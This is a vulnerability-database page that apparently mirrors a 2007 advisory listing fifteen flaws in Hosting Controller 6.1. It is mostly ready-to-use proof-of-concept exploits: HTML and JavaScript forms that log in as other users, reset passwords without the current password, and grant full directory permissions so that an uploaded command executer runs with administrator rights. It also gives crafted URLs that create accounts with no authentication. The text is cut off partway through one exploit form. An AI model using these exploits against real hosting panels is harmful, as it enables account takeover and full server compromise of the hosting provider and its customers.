Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Hosting Controller 6.1 Hot fix <= 3.3 Multiple Remote Vulnerabilities

🗓️ 14 Dec 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 42 Views

Hosting Controller 6.1 Hot fix <= 3.3 Multiple Remote Vulnerabilities - Full system admin access, Exploit availabl

Code

                                                Title:&nbsp;Multiple&nbsp;Security&nbsp;Bugs&nbsp;In&nbsp;Hosting&nbsp;Controller
Critical:&nbsp;Extremely&nbsp;critical
Impact:&nbsp;Full&nbsp;system&nbsp;administrator&nbsp;access
Vendor:&nbsp;Hosting&nbsp;Controller
Version:&nbsp;6.1&nbsp;Hot&nbsp;fix&nbsp;&lt;=&nbsp;3.3
Vendor&nbsp;URL:&nbsp;www.hostingcontroller.com
Solution:&nbsp;N/A&nbsp;From&nbsp;company&nbsp;-&nbsp;There&nbsp;is&nbsp;temporary&nbsp;solution&nbsp;in&nbsp;this&nbsp;report
Exploit:&nbsp;Available
Release&nbsp;Date:&nbsp;2007&nbsp;-&nbsp;December
Credit:&nbsp;www.BugReport.ir

####################
-&nbsp;Discussion:
####################

1-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;login&nbsp;to&nbsp;hosting&nbsp;controller&nbsp;Panel.&nbsp;He&nbsp;can&nbsp;also&nbsp;change&nbsp;all&nbsp;others'&nbsp;passwords.
2-&nbsp;[User]&nbsp;can&nbsp;copy&nbsp;a&nbsp;file&nbsp;to&nbsp;hosting&nbsp;controller&nbsp;web&nbsp;directory&nbsp;which&nbsp;is&nbsp;executed&nbsp;under&nbsp;administrative&nbsp;privilege,&nbsp;so&nbsp;attacker&nbsp;can&nbsp;execute&nbsp;his&nbsp;commands&nbsp;by&nbsp;administrative&nbsp;privilege.&nbsp;e.g.&nbsp;an&nbsp;attacker&nbsp;can&nbsp;gain&nbsp;remote&nbsp;desktop&nbsp;of&nbsp;server&nbsp;using&nbsp;this&nbsp;bug&nbsp;and&nbsp;uploading&nbsp;an&nbsp;ASP&nbsp;file!
3-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;make&nbsp;a&nbsp;new&nbsp;user.
4-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;change&nbsp;all&nbsp;user's&nbsp;profiles.
5-&nbsp;[User]&nbsp;can&nbsp;see&nbsp;all&nbsp;the&nbsp;database&nbsp;information&nbsp;by&nbsp;a&nbsp;SQL&nbsp;injection.
6-&nbsp;[User]&nbsp;can&nbsp;change&nbsp;his&nbsp;credit&nbsp;amount&nbsp;or&nbsp;increase&nbsp;his&nbsp;discount.
7-&nbsp;[User]&nbsp;can&nbsp;uninstall&nbsp;other's&nbsp;FrontPage&nbsp;extensions.
8-&nbsp;[User]&nbsp;can&nbsp;delete&nbsp;all&nbsp;of&nbsp;gateway&nbsp;information.
9-&nbsp;[User]&nbsp;can&nbsp;enable&nbsp;or&nbsp;disable&nbsp;pay&nbsp;type.
10-&nbsp;[[User]&nbsp;can&nbsp;see&nbsp;all&nbsp;usernames&nbsp;in&nbsp;the&nbsp;server&nbsp;by&nbsp;&quot;fp2000/NEWSRVR.asp&quot;.
11-&nbsp;[User]&nbsp;can&nbsp;find&nbsp;Hosting&nbsp;Controller&nbsp;setup&nbsp;directory.
12-&nbsp;[User]&nbsp;can&nbsp;import&nbsp;unwanted&nbsp;plan&nbsp;or&nbsp;change&nbsp;the&nbsp;plans.
13-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;find&nbsp;web&nbsp;site&nbsp;path.
14-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;enable&nbsp;or&nbsp;disable&nbsp;all&nbsp;Hosting&nbsp;Controller&nbsp;forums&nbsp;by&nbsp;SQL&nbsp;Injection.
15-&nbsp;[User]&nbsp;can&nbsp;change&nbsp;other's&nbsp;host&nbsp;headers.

[Remote&nbsp;attacker]&nbsp;=&nbsp;(Unauthorized&nbsp;user&nbsp;without&nbsp;any&nbsp;permission&nbsp;or&nbsp;access.)
[User]&nbsp;=&nbsp;(A&nbsp;user&nbsp;with&nbsp;a&nbsp;simple&nbsp;account.)

####################
-&nbsp;Exploits:&nbsp;(or&nbsp;POCs)
####################

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

1-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;login&nbsp;to&nbsp;hosting&nbsp;controller&nbsp;Panel.&nbsp;He&nbsp;can&nbsp;also&nbsp;change&nbsp;all&nbsp;others'&nbsp;passwords:
&nbsp;&nbsp;&nbsp;&nbsp;1.1-&nbsp;http://[HC&nbsp;URL]/hosting/addreseller.asp?reseller=[USERNAME]&nbsp;&nbsp;-&gt;&nbsp;for&nbsp;ex.&nbsp;[USERNAME]=&nbsp;resadmin
&nbsp;&nbsp;&nbsp;&nbsp;1.2-&nbsp;Now,&nbsp;to&nbsp;login&nbsp;without&nbsp;changing&nbsp;the&nbsp;password,&nbsp;attacker&nbsp;must&nbsp;run&nbsp;&quot;ChangeDisplay.htm&quot;&nbsp;then&nbsp;redirect&nbsp;to&nbsp;&quot;main.asp&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~1.2.1&nbsp;ChangeDisplay.htm~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;script&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function&nbsp;check(){
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_action&nbsp;=&nbsp;'/AdminSettings/displays.asp?DecideAction=1&amp;ChangeSkin=1'
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmDisplay.action&nbsp;=&nbsp;window.document.all.URL.value&nbsp;+&nbsp;_action
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;true;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;URL:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;URL&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;form&nbsp;name=&quot;frmDisplay&quot;&nbsp;action=&quot;&quot;&nbsp;method=&quot;post&quot;&nbsp;onsubmit=&quot;return&nbsp;check()&quot;&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;hidden&quot;&nbsp;name=&quot;TemplateSkin&quot;&nbsp;value=&quot;PanelXP/Blue&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;submit&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/form&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&nbsp;1.3-&nbsp;Attacker,&nbsp;also&nbsp;can&nbsp;change&nbsp;username's&nbsp;password&nbsp;without&nbsp;having&nbsp;current&nbsp;password&nbsp;by&nbsp;&quot;ChangePass.htm&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~1.3.1&nbsp;ChangePass.htm~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;script&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function&nbsp;check(){
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_action&nbsp;=&nbsp;'/Accounts/AccountActions.asp?ActionType=UpdateUser'
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmChangePass.action&nbsp;=&nbsp;window.document.all.URL.value&nbsp;+&nbsp;_action
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;true;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;URL:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;URL&quot;&nbsp;/&gt;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;form&nbsp;name=&quot;frmChangePass&quot;&nbsp;action=&quot;&quot;&nbsp;method=&quot;post&quot;&nbsp;onsubmit=&quot;return&nbsp;check()&quot;&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;UserName:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;UserName&quot;&nbsp;value=&quot;[USERNAME]&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FullName:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;FullName&quot;&nbsp;value=&quot;[USERNAME]&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Description:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;Description&quot;&nbsp;value=&quot;Something&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Password:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;Pass1&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Confirm&nbsp;Password:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;ConfPass&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;hidden&quot;&nbsp;name=&quot;DefaultDiscount&quot;&nbsp;value=&quot;0&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;hidden&quot;&nbsp;name=&quot;CreditLimit&quot;&nbsp;value=&quot;0&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;hidden&quot;&nbsp;name=&quot;ActionType&quot;&nbsp;value=&quot;AddUser&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;hidden&quot;&nbsp;name=&quot;PassCheck&quot;&nbsp;value=&quot;TRUE&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;submit&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/form&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

2-&nbsp;[User]&nbsp;can&nbsp;copy&nbsp;a&nbsp;file&nbsp;to&nbsp;hosting&nbsp;controller&nbsp;web&nbsp;directory&nbsp;which&nbsp;is&nbsp;executed&nbsp;under&nbsp;administrator's&nbsp;privilege,&nbsp;so&nbsp;attacker&nbsp;can&nbsp;execute&nbsp;his&nbsp;commands&nbsp;by&nbsp;administrator's&nbsp;privilege.&nbsp;For&nbsp;example&nbsp;attacker&nbsp;can&nbsp;gain&nbsp;remote&nbsp;desktop&nbsp;of&nbsp;server&nbsp;by&nbsp;this&nbsp;way&nbsp;and&nbsp;uploading&nbsp;an&nbsp;ASP&nbsp;file!
This&nbsp;bug&nbsp;is&nbsp;because&nbsp;of&nbsp;&quot;inc_newuser.asp&quot;&nbsp;that&nbsp;can&nbsp;set&nbsp;full&nbsp;control&nbsp;permission&nbsp;on&nbsp;each&nbsp;&quot;db&quot;,&quot;www&quot;,&quot;Special&quot;,&nbsp;or&nbsp;&quot;log&quot;&nbsp;directory&nbsp;on&nbsp;the&nbsp;server.
This&nbsp;part&nbsp;is&nbsp;more&nbsp;complicated&nbsp;than&nbsp;the&nbsp;others,&nbsp;so&nbsp;we&nbsp;describe&nbsp;it&nbsp;more&nbsp;too.
&nbsp;&nbsp;&nbsp;&nbsp;2.1-&nbsp;We&nbsp;have&nbsp;a&nbsp;username,&nbsp;for&nbsp;ex.&nbsp;?testuser?&nbsp;for&nbsp;a&nbsp;site&nbsp;like&nbsp;?testuser.com?
&nbsp;&nbsp;&nbsp;&nbsp;2.2-&nbsp;Login&nbsp;by&nbsp;&quot;testuser&quot;&nbsp;and&nbsp;its&nbsp;password.
&nbsp;2.3-&nbsp;Find&nbsp;Hosting&nbsp;Controller&nbsp;setup&nbsp;directory&nbsp;as&nbsp;we&nbsp;wrote&nbsp;it&nbsp;in&nbsp;part&nbsp;11.&nbsp;(default&nbsp;directory&nbsp;is&nbsp;?C:\Program&nbsp;Files\Advanced&nbsp;Communications\Hosting&nbsp;Controller\web\admin\?)
&nbsp;&nbsp;&nbsp;&nbsp;2.4-&nbsp;Find&nbsp;?testuser.com?&nbsp;IIS&nbsp;username&nbsp;by&nbsp;uploading&nbsp;a&nbsp;file&nbsp;or&nbsp;by&nbsp;seeing&nbsp;all&nbsp;system&nbsp;user&nbsp;(part&nbsp;10)&nbsp;or&nbsp;by&nbsp;your&nbsp;experience&nbsp;(username&nbsp;for&nbsp;?testuser.com?&nbsp;is&nbsp;always&nbsp;like&nbsp;?testusercom_web?&nbsp;)
&nbsp;&nbsp;&nbsp;&nbsp;2.5-&nbsp;Drag&nbsp;&amp;&nbsp;drop&nbsp;&quot;SetPermission.htm&quot;&nbsp;to&nbsp;your&nbsp;current&nbsp;browser's&nbsp;window&nbsp;(that&nbsp;is&nbsp;logged&nbsp;in&nbsp;Hosting&nbsp;Controller)&nbsp;and&nbsp;fill&nbsp;it.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~2.5.1&nbsp;SetPermission.htm~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;pre&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;This&nbsp;file&nbsp;set&nbsp;full&nbsp;permission&nbsp;on&nbsp;&quot;DB&quot;&nbsp;directory&nbsp;of&nbsp;&quot;forum&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;So&nbsp;you&nbsp;can&nbsp;upload&nbsp;your&nbsp;file&nbsp;there&nbsp;and&nbsp;execute&nbsp;your&nbsp;command&nbsp;with&nbsp;administrator&nbsp;permission.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/pre&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;script&nbsp;language=&quot;javascript&quot;&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function&nbsp;check(){
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_action&nbsp;=&nbsp;'/accounts/AccountActions.asp?ActionType=AddUser'
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_forumdir&nbsp;=&nbsp;'\\forum|1'
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmPermission.action&nbsp;=&nbsp;frmPermission.URL.value&nbsp;+&nbsp;_action
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmPermission.Dirroot.value&nbsp;=&nbsp;frmPermission.hcpath.value&nbsp;+&nbsp;_forumdir
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(frmPermission.NewName.value.length&gt;20){
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;alert('Enter&nbsp;a&nbsp;username&nbsp;less&nbsp;than&nbsp;20&nbsp;char&nbsp;like&nbsp;ASPNET');
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmPermission.NewName.focus();
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;false;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}else&nbsp;return&nbsp;true;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;form&nbsp;name=&quot;frmPermission&quot;&nbsp;action=&quot;&quot;&nbsp;method=&quot;post&quot;&nbsp;onsubmit=&quot;return&nbsp;check()&quot;&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Site&nbsp;URL:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;URL&quot;&nbsp;size=&quot;30&quot;&gt;&nbsp;&lt;font&nbsp;size=&quot;2&quot;&gt;like:&nbsp;http://tesuser.com:8077&nbsp;or&nbsp;http://testuser.com/admin&lt;/font&gt;&lt;br&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Username&nbsp;(less&nbsp;than&nbsp;20):&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;NewName&quot;&nbsp;size=&quot;30&quot;&gt;&nbsp;&lt;font&nbsp;size=&quot;2&quot;&gt;like:&nbsp;ASPNET&nbsp;or&nbsp;testusercom_web&nbsp;&lt;/font&gt;&lt;br&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HC&nbsp;Files&nbsp;Path&nbsp;(no&nbsp;back-slash&nbsp;at&nbsp;end):&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;hcpath&quot;&nbsp;size=&quot;30&quot;&gt;&nbsp;&lt;font&nbsp;size=&quot;2&quot;&gt;like:&nbsp;C:\Program&nbsp;Files\Advanced&nbsp;Communications\Hosting&nbsp;Controller\web\admin&lt;/font&gt;&lt;br&gt;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;br&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;hidden&quot;&nbsp;name=&quot;Dirroot&quot;&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;hidden&quot;&nbsp;value=&quot;db&quot;&nbsp;name=&quot;anything1&quot;&gt;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;br&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;submit&quot;&nbsp;value=&quot;Go!&quot;&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;reset&quot;&nbsp;value=&quot;Reset&quot;&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/form&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&nbsp;2.6-&nbsp;If&nbsp;you&nbsp;see&nbsp;?Error:&nbsp;70500170&nbsp;:&nbsp;User&nbsp;already&nbsp;exists&nbsp;in&nbsp;either&nbsp;OS&nbsp;or&nbsp;Database.?&nbsp;Means&nbsp;that&nbsp;all&nbsp;the&nbsp;thing&nbsp;are&nbsp;OK!,&nbsp;and&nbsp;your&nbsp;permission&nbsp;has&nbsp;already&nbsp;set.
&nbsp;&nbsp;&nbsp;&nbsp;2.7-&nbsp;Now&nbsp;you&nbsp;have&nbsp;a&nbsp;full&nbsp;access&nbsp;to&nbsp;&quot;[HCPATH]\Forum\DB&quot;.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Note:&nbsp;You&nbsp;can&nbsp;do&nbsp;that&nbsp;with&nbsp;&quot;[HCPATH]\phpBB\phpBB\db&quot;&nbsp;too&nbsp;because&nbsp;there&nbsp;is&nbsp;&quot;db&quot;&nbsp;directory&nbsp;too.
&nbsp;&nbsp;&nbsp;2.8-&nbsp;So&nbsp;you&nbsp;can&nbsp;upload&nbsp;your&nbsp;command&nbsp;executer&nbsp;there,&nbsp;but&nbsp;you&nbsp;need&nbsp;a&nbsp;file&nbsp;uploader&nbsp;at&nbsp;first&nbsp;on&nbsp;&quot;testuser.com&quot;&nbsp;to&nbsp;upload&nbsp;your&nbsp;command&nbsp;executer&nbsp;on&nbsp;&quot;[HCPATH]\Forum\DB&quot;.
&nbsp;2.9-&nbsp;If&nbsp;your&nbsp;permission&nbsp;has&nbsp;not&nbsp;been&nbsp;set&nbsp;correctly,&nbsp;its&nbsp;always&nbsp;because&nbsp;of&nbsp;limitation&nbsp;on&nbsp;making&nbsp;a&nbsp;new&nbsp;user.&nbsp;So&nbsp;you&nbsp;must&nbsp;login&nbsp;with&nbsp;username's&nbsp;reseller&nbsp;and&nbsp;make&nbsp;a&nbsp;new&nbsp;plan&nbsp;with&nbsp;making&nbsp;some&nbsp;new&nbsp;user&nbsp;accounts&nbsp;permission&nbsp;then&nbsp;sell&nbsp;it&nbsp;to&nbsp;your&nbsp;username.&nbsp;Also,&nbsp;you&nbsp;can&nbsp;increase&nbsp;your&nbsp;credit&nbsp;amount&nbsp;(part&nbsp;6)&nbsp;and&nbsp;buy&nbsp;a&nbsp;plan&nbsp;with&nbsp;a&nbsp;lot&nbsp;of&nbsp;web&nbsp;accounts&nbsp;then&nbsp;select&nbsp;it&nbsp;and&nbsp;do&nbsp;these&nbsp;operation&nbsp;from&nbsp;the&nbsp;first.&nbsp;(Note:&nbsp;This&nbsp;vulnerability&nbsp;works&nbsp;properly&nbsp;and&nbsp;there&nbsp;is&nbsp;no&nbsp;exception&nbsp;like&nbsp;the&nbsp;others!)

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

3-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;make&nbsp;a&nbsp;new&nbsp;user.
&nbsp;&nbsp;&nbsp;&nbsp;3.1-&nbsp;Goto&nbsp;http://[HC&nbsp;URL]/hosting/default.asp?referral=&quot;http://&quot;
&nbsp;&nbsp;&nbsp;&nbsp;3.2-&nbsp;Then&nbsp;http://[HC&nbsp;URL]/hosting/selectdomain.asp?htype=HTYPE
&nbsp;&nbsp;&nbsp;&nbsp;3.3-&nbsp;Then&nbsp;http://[HC&nbsp;URL]/hosting/addsubsite.asp?reseller=resadmin&amp;loginname=Bugreport&amp;password=something&amp;[email protected]&amp;DomainName=Bugreport.com

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

4-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;change&nbsp;all&nbsp;user's&nbsp;profiles.
&nbsp;4.1-&nbsp;Use&nbsp;&quot;Change&nbsp;Profiles.htm&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~4.1.1&nbsp;ChangeProfiles.htm~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&lt;script&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function&nbsp;check(){
